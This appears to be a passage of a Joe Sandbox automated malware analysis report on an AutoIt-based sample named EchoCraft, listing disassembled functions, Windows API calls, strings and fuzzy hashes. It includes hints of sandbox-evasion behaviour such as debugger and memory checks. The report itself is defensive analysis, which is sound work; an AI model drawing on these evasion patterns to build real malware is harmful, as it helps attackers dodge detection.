pow, xrefs: 00AAE705, 00AAE722

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: eb3c7991ec2b64b7dcc566c906879e445fe8f7f08a5f7c967f632774fa9b51eb
Instruction ID: 77ff8f37f3cea2bde72157d75defe8439b33bc3b655630b4d8d04037ad2d9e1d
Opcode Fuzzy Hash: eb3c7991ec2b64b7dcc566c906879e445fe8f7f08a5f7c967f632774fa9b51eb
Instruction Fuzzy Hash: 92516E71A0950196DB11F71CDE413EA6BECEB41B00F244E59F0A1472EAEF3C8C96DA46

Function 00A9B040 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 172COMMON

Download Yara Rule

Strings

#, xrefs: 00A9B06A

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 8ce42011c815b95abf810b904b9bf28dd2654a127c69b2bd8f47087df8050880
Instruction ID: 4b26a1a8e2f47f00d995e58e36fb3bd1b494e5ebea22a4cf096cf9fde4c91b3a
Opcode Fuzzy Hash: 8ce42011c815b95abf810b904b9bf28dd2654a127c69b2bd8f47087df8050880
Instruction Fuzzy Hash: 3251EE39A04246DFCF15DF28E5946FE7BA1EF15310F74415AE8929B390EB389D42CB60

Function 00A9F5B9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00A9F5CA
GlobalMemoryStatusEx.KERNEL32(?), ref: 00A9F5E3

Strings

@, xrefs: 00A9F5D7

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: a9b9a0af3544d2d1b77e20dfb5523acc08dc138075b982cc22317a9cc4a04758
Instruction ID: d15545e2a235f8af8eab1d29cdb884b57120fc0c18d32c5d738f3eb7c26e1d39
Opcode Fuzzy Hash: a9b9a0af3544d2d1b77e20dfb5523acc08dc138075b982cc22317a9cc4a04758
Instruction Fuzzy Hash: 345146715087449BD720AF10DD86BAFBBE8FF84340F81885DF5D9422A1DF308929CB66

Function 00AFD922 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00AFD95E
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00AFD968

Strings

|, xrefs: 00AFD939

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: 419bcbad3fcb999367eb4f9b58fbfa738683f390c2ce408e420a8f253b93de27
Instruction ID: cfda5099bbc7bba6b4de7207934649cc3374024fe2968a456a4cd82611cb0f2d
Opcode Fuzzy Hash: 419bcbad3fcb999367eb4f9b58fbfa738683f390c2ce408e420a8f253b93de27
Instruction Fuzzy Hash: CC315C71C10119AFCF01EFA5DE85AEEBFB9FF18340F040019FA15A6166DB719A16CB60

Function 00B13C46 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00B13CFB
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00B13D36

Strings

static, xrefs: 00B13C96

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 3c761bab17e9dcf592c7600208d371f8e808b82af9e83cb8a8f1f306afeb4fd8
Instruction ID: 29dc506c224e220db7cdc0ff1ce1f7ecbe671bf710e7351b76bfd95a60b6c1a3
Opcode Fuzzy Hash: 3c761bab17e9dcf592c7600208d371f8e808b82af9e83cb8a8f1f306afeb4fd8
Instruction Fuzzy Hash: 3F318F71110604AAEB109F78DC80FFB77E9FF48B64F50865DF9A597190DA70AD81C760

Function 00B14C13 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00B14CFB
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B14D10

Strings

', xrefs: 00B14C6A

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 4e2bbdc89ef2cd7941b8b994345b25e058d6a9be299e1138b5eee5b142d42d6b
Instruction ID: 768cd3fe2c09918d638702712b3bcc35d27df509296744d62c9d00878fe99d0f
Opcode Fuzzy Hash: 4e2bbdc89ef2cd7941b8b994345b25e058d6a9be299e1138b5eee5b142d42d6b
Instruction Fuzzy Hash: 8F310674A0231AAFDF14CFA9D980BDA7BF5FB49300F5051A9E904AB391D770A981CF90

Function 00B138C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00B13956
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B13961

Strings

Combobox, xrefs: 00B13923

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 9d96274bc45e248f74c0909a1f33900d8b69f9592e780de2646483f6f4b2b6c4
Instruction ID: df54680a57267b70ac686000617ce2a44430e9c86254eb2b971ab4849b8d3c12
Opcode Fuzzy Hash: 9d96274bc45e248f74c0909a1f33900d8b69f9592e780de2646483f6f4b2b6c4
Instruction Fuzzy Hash: 3611E271700208BFEF118F54CC80EFB37EAEB847A4F500165F919972D0EA719D918760

Function 00AFD54C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00AFD5AB
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00AFD5D4

Strings

<local>, xrefs: 00AFD594

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 4a5f8521bfe259722125fe680fe40e87a0bcdcbfd4adce14793a8c23e089967f
Instruction ID: 152048066a7878177b9504fd674bf2e9551df5be674101d7da1e1e2b23997cf1
Opcode Fuzzy Hash: 4a5f8521bfe259722125fe680fe40e87a0bcdcbfd4adce14793a8c23e089967f
Instruction Fuzzy Hash: 6A11C671245239B9D7394BE68C49FF7BFAEEF227A8F00421AB20993180D7749940D6F0

Function 00B13B03 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00B13B85
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00B13B94

Strings

edit, xrefs: 00B13B69

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 21b90a50882055006f4771e1970303d1b951b6d6f575e433d05b8df11567518f
Instruction ID: 56cf6b1676c0c39f1264e7be226165b25cd4af2b56fa9a822d491aa9c04810fc
Opcode Fuzzy Hash: 21b90a50882055006f4771e1970303d1b951b6d6f575e433d05b8df11567518f
Instruction Fuzzy Hash: B1118C71504208ABEF108E64DC84AFB3BEAEF05778FA04354F965931E0EB75DD919B60

Function 00AE74A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00A8C110: _wcslen.LIBCMT ref: 00A8C11A

CharUpperBuffW.USER32(?,?,?), ref: 00AE74D2
_wcslen.LIBCMT ref: 00AE74DE

Strings

STOP, xrefs: 00AE74D8, 00AE74DD

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: 53f316807e68cbe78f2d0039e83ec5c816b6fb572e113cf0271db36b69e01f37
Instruction ID: b62fde34d070817fd7bf3c658046f7780478afe998ef710af49fb0434c9c65d3
Opcode Fuzzy Hash: 53f316807e68cbe78f2d0039e83ec5c816b6fb572e113cf0271db36b69e01f37
Instruction Fuzzy Hash: 8401D232A185AA8BCB10AFBEDC909BF77B5BF60714B500928F82697191EB30DD00C760

Function 00AE2558 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A8C110: _wcslen.LIBCMT ref: 00A8C11A

Part of subcall function 00AE44BB: GetClassNameW.USER32(?,?,000000FF), ref: 00AE44DE

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00AE25C6

Strings

ListBox, xrefs: 00AE2590
ComboBox, xrefs: 00AE2565

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 7671efb264a5dba542d36142ba1f86b127cd252ede57bdd0090fbce6bcce35a2
Instruction ID: de7c1ac83d2d115d1b9e9cefe672277922dab69eedcf599a286968caff64ac15
Opcode Fuzzy Hash: 7671efb264a5dba542d36142ba1f86b127cd252ede57bdd0090fbce6bcce35a2
Instruction Fuzzy Hash: 0F01DD716002546BCB04F7A5CD65AFF77ACFB06350B100A15F472572D2DE399908CB60

Function 00AE2452 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A8C110: _wcslen.LIBCMT ref: 00A8C11A

Part of subcall function 00AE44BB: GetClassNameW.USER32(?,?,000000FF), ref: 00AE44DE

SendMessageW.USER32(?,00000180,00000000,?), ref: 00AE24C0

Strings

ListBox, xrefs: 00AE248A
ComboBox, xrefs: 00AE245F

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 4c9784544a04645d7ef36232f81c2ffaaed873e5f79b562ab449e9b9b2ccb59b
Instruction ID: 39eda5d9c4d398f7f0a4a3fe2a6f94d5fd5369b357cfbf013a745971240397b1
Opcode Fuzzy Hash: 4c9784544a04645d7ef36232f81c2ffaaed873e5f79b562ab449e9b9b2ccb59b
Instruction Fuzzy Hash: 3E018F71B401446BCB14EBA1CA56BEE77ECAB15340F101416B852632C2DA689E089771

Function 00AE24D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A8C110: _wcslen.LIBCMT ref: 00A8C11A

Part of subcall function 00AE44BB: GetClassNameW.USER32(?,?,000000FF), ref: 00AE44DE

SendMessageW.USER32(?,00000182,?,00000000), ref: 00AE2542

Strings

ListBox, xrefs: 00AE250E
ComboBox, xrefs: 00AE24E3

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 0fce134bfedf670e1a12474c7a595560a93cb7767538e8343febfd313e8a5d36
Instruction ID: 8ec139f9a01b8e7c8af7e3b9fefee3abe169ba3c234f795a3d8a3b693fc6d5e0
Opcode Fuzzy Hash: 0fce134bfedf670e1a12474c7a595560a93cb7767538e8343febfd313e8a5d36
Instruction Fuzzy Hash: 0101A271A4014467CB10F7A5CA52FEF77ACAB15340F201015B452A32C2DA29DE089771

Function 00ADE96F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00ADE98D
_wcslen.LIBCMT ref: 00ADE9CB

Strings

3, 3, 15, 3, xrefs: 00ADE975

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: _wcslen
String ID: 3, 3, 15, 3
API String ID: 176396367-1239129305
Opcode ID: f6cce0a3225713ee103759029336a644ea69bc52085480e8e5f8fb700e2babdd
Instruction ID: c575faef4a4f0be9a477ebde61ff33c96b913d1925a1161c671d3954bdc4e5c1
Opcode Fuzzy Hash: f6cce0a3225713ee103759029336a644ea69bc52085480e8e5f8fb700e2babdd
Instruction Fuzzy Hash: 63F0961564125455CBE1E7749DD9B7D72E4AF88700F2058BBE40ACB390FF60CD859780

Function 00AE138F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00AE139D

Strings

AutoIt, xrefs: 00AE1391
Error allocating memory., xrefs: 00AE1396

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: 64c6d97cecaac4dc4c76590bdfe2880e37b78a090d8d3013ba0eb26911154226
Instruction ID: 05c8e86faf7f218ee43c5650031e3ca345c233b5d06374f933888b7df6c8de47
Opcode Fuzzy Hash: 64c6d97cecaac4dc4c76590bdfe2880e37b78a090d8d3013ba0eb26911154226
Instruction Fuzzy Hash: 34E0DF7224836822D21037A46D0BFC97AC48F06F60F60485AFA485A8C29BF264805699

Function 00AA1162 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00A9FAF1: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00AA1191,?,?,?,00A8100A), ref: 00A9FAF6

IsDebuggerPresent.KERNEL32(?,?,?,00A8100A), ref: 00AA1195
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00A8100A), ref: 00AA11A4

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00AA119F

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: 260bcdf6bb5c9d32fa9e4ee48258ff5d739fa96294505b67c6d761e3ed0e056c
Instruction ID: 44c5e9447acfd1addccbe145b494ce03d2f1d6bed4222a8cc893bdcfc390e715
Opcode Fuzzy Hash: 260bcdf6bb5c9d32fa9e4ee48258ff5d739fa96294505b67c6d761e3ed0e056c
Instruction Fuzzy Hash: 5EE092706007208FD760AF28E944742BBE4AF15304F058E6CE85AC3791DBB4D484CBD1

Function 00AF38AA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00AF38C2
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00AF38D7

Strings

aut, xrefs: 00AF38CB

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: fb8b19d10828928b1af4107532152f850eeb52bb0fd74b151131f64a111f2199
Instruction ID: 72be5087d669a3a4ee111004c74177867de36743c28c1e9ac2a4fb35b6ee0b53
Opcode Fuzzy Hash: fb8b19d10828928b1af4107532152f850eeb52bb0fd74b151131f64a111f2199
Instruction Fuzzy Hash: D7D05E7254032867DA20A764DC0EFCB7B6CDB44710F4002A1BA65920A1DFF4DA85CBD0

Function 00B129FC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B12A06
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00B12A19

Part of subcall function 00AEF152: Sleep.KERNEL32 ref: 00AEF1CA

Strings

Shell_TrayWnd, xrefs: 00B129FF

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 962b0e1ac0b7688aca81927c406dffb7cc29a3a6a9d1aeca569f356081c44fcd
Instruction ID: fa24bf6d6c634f2a97c97f446eaa71552975985b6037808c5eaf14fc9f1d3c51
Opcode Fuzzy Hash: 962b0e1ac0b7688aca81927c406dffb7cc29a3a6a9d1aeca569f356081c44fcd
Instruction Fuzzy Hash: 42D012363C5354BBE668B7B0ED0FFD66A55AF50B10F5048757349AB1D0CDE46800C694

Function 00B12A30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B12A46
PostMessageW.USER32(00000000), ref: 00B12A4D

Part of subcall function 00AEF152: Sleep.KERNEL32 ref: 00AEF1CA

Strings

Shell_TrayWnd, xrefs: 00B12A3F

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
